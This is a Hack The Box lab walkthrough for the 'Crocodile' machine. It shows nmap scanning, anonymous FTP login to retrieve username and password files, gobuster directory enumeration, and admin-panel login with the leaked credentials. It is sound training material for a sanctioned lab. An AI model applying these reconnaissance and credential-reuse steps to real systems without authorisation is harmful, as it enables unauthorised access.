---
sidebar_position: 3
sidebar_label: 🐊 Crocodile
description: On this machine, we will get the credentials through the FTP server, then we will use a tool to discover the login page, and finally we will access the admin's control panel to get the flag.
last_update:
  date: 2022/06/10
  author: Raúl Sánchez
tags:
  - FTP
  - Gobuster
keywords: 
  - Hack The Box
  - HTB
  - HTB Writeups
  - Hacking
  - HTB Walkthrough
  - Write-up
  - Walkthrough
---

# Crocodile

> On this machine, we will get the credentials through the FTP server, then we will use a tool to discover the login page, and finally we will access the admin's control panel to get the flag.

## 0. Start the machine

To start machine, Just click "Spawn Machine".

![Spawn Crocodile Machine](crocodile1.png)

Then you can see the **IP** address for that machine. In this case the machine has the IP `10.129.242.148`. Before going to enumeration steps we can simply ping to the IP address and check our **VPN** connection and whether machine is alive. Sometimes machines might "Disable" ping requests from passing through the firewall. But in most case ping will be a success!

```python
❯ ping -c1 10.129.242.148
PING 10.129.242.148 (10.129.242.148) 56(84) bytes of data.
64 bytes from 10.129.242.148: icmp_seq=1 ttl=63 time=83.0 ms

--- 10.129.242.148 ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 82.971/82.971/82.971/0.000 ms
```

:::caution Disclaimer
No flags (user/root) are shown in this **writeup**, so follow the procedures to grab the flags! Enjoy! 👽️
:::

## 1. Enumeration

The first thing to do is to identify which operating system you are using. We will use the [whichSystem.py](https://github.com/RaulSanchezzt/kali-bspmw/blob/master/tools/whichSystem.py) tool to find out.

```python
❯ whichSystem.py 10.129.242.148

10.129.242.148 (ttl -> 63): Linux
```

:::info
By default Linux has a TTL of 64 and Windows has 128.
:::

Then, we will use the [nmap](https://nmap.org/) tool with the following parameters:

* [-sV](https://nmap.org/book/man-version-detection.html) : to see the services and their version.
* \-sC : performs a script scan using the default set of scripts.

```python
❯ nmap -sV -sC 10.129.242.148
Starting Nmap 7.92 ( https://nmap.org ) at 2022-06-10 17:05 CEST
Nmap scan report for 10.129.242.148
Host is up (0.054s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| -rw-r--r--    1 ftp      ftp            33 Jun 08  2021 allowed.userlist
|_-rw-r--r--    1 ftp      ftp            62 Apr 20  2021 allowed.userlist.passwd
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:10.10.15.7
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 2
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Smash - Bootstrap Business Template
Service Info: OS: Unix
```

We have two open ports: 21/tcp and 80/tcp. Port 21 is the port dedicated to [FTP](https://en.wikipedia.org/wiki/File\_Transfer\_Protocol)  and port 80 is dedicated to host webpages ([http](https://en.wikipedia.org/wiki/Hypertext\_Transfer\_Protocol)).

:::note
The **File Transfer Protocol** is a standard communication protocol used for the transfer of computer files from a server to a client on a computer network.

The **Hypertext Transfer Protocol** is an application layer protocol in the Internet protocol suite model for distributed, collaborative, hypermedia information systems.
:::

## 2. Foothold

To connect to the remote FTP server, specify the target's IP address and use the **anonymous** user to login. Once logged in, you can type the `dir` command to list the directories.

```python
❯ ftp 10.129.242.148
Connected to 10.129.242.148.
220 (vsFTPd 3.0.3)
Name (10.129.242.148:raul): anonymous
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> dir
229 Entering Extended Passive Mode (|||43819|)
150 Here comes the directory listing.
-rw-r--r--    1 ftp      ftp            33 Jun 08  2021 allowed.userlist
-rw-r--r--    1 ftp      ftp            62 Apr 20  2021 allowed.userlist.passwd
226 Directory send OK.
```

Then, download the files with `get`.

```python
ftp> get allowed.userlist
local: allowed.userlist remote: allowed.userlist
229 Entering Extended Passive Mode (|||49592|)
150 Opening BINARY mode data connection for allowed.userlist (33 bytes).
100% |*************************************|    33      528.30 KiB/s    00:00 ETA
226 Transfer complete.
33 bytes received in 00:00 (0.29 KiB/s)
ftp> get allowed.userlist.passwd
local: allowed.userlist.passwd remote: allowed.userlist.passwd
229 Entering Extended Passive Mode (|||45921|)
150 Opening BINARY mode data connection for allowed.userlist.passwd (62 bytes).
100% |*************************************|    62        1.11 MiB/s    00:00 ETA
226 Transfer complete.
62 bytes received in 00:00 (1.30 KiB/s)
ftp> quit
221 Goodbye
```

Now we can use the `cat` command, to read the content of the files.

```shell
❯ cat allowed.userlist
───────┬────────────────────────────────────────────────────────────────────────────────────────
       │ File: allowed.userlist
       │ Size: 33 B
───────┼────────────────────────────────────────────────────────────────────────────────────────
   1   │ aron
   2   │ pwnmeow
   3   │ egotisticalsw
   4   │ admin
───────┴────────────────────────────────────────────────────────────────────────────────────────
❯ cat allowed.userlist.passwd
───────┬────────────────────────────────────────────────────────────────────────────────────────
       │ File: allowed.userlist.passwd
       │ Size: 62 B
───────┼────────────────────────────────────────────────────────────────────────────────────────
   1   │ root
   2   │ Supersecretpassword1
   3   │ @BaASD&9032123sADS
   4   │ rKXM59ESxesUFHAd
───────┴────────────────────────────────────────────────────────────────────────────────────────
```

After that, we can scan the directories of the web page properly using Gobuster to its full capabilities. The flags we will be using with this command are as follows:

* dir : Specify that we wish to do web directory enumeration.&#x20;
* \-u : Specify the web address of the target machine that runs the HTTP server.&#x20;
* \--wordlist : Specify the wordlist that we want to use.
* \-x : specify the filetype we are searching.

```python
❯ gobuster dir -u http://10.129.242.148 --wordlist /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -x php,html
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.129.242.148
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Extensions:              php,html
[+] Timeout:                 10s
===============================================================
2022/06/10 17:23:01 Starting gobuster in directory enumeration mode
===============================================================
/index.html           (Status: 200) [Size: 58565]
/login.php            (Status: 200) [Size: 1577] 
/assets               (Status: 301) [Size: 317] [--> http://10.129.242.148/assets/]
/css                  (Status: 301) [Size: 314] [--> http://10.129.242.148/css/]   
/js                   (Status: 301) [Size: 313] [--> http://10.129.242.148/js/]    
/logout.php           (Status: 302) [Size: 0] [--> login.php]                      
/config.php           (Status: 200) [Size: 0]                                      
/fonts                (Status: 301) [Size: 316] [--> http://10.129.242.148/fonts/] 
/dashboard            (Status: 301) [Size: 320] [--> http://10.129.242.148/dashboard/]
                                                                                      
===============================================================
2022/06/10 17:26:19 Finished
===============================================================
```

We see some interesting files like `login.php`. So navigate manually to that file and found an admin panel. Will it work with the administrator credentials we got earlier?

![Admin Panel](crocodile2.png)

It worked! We got the flag!&#x20;

![Flag](crocodile3.png)
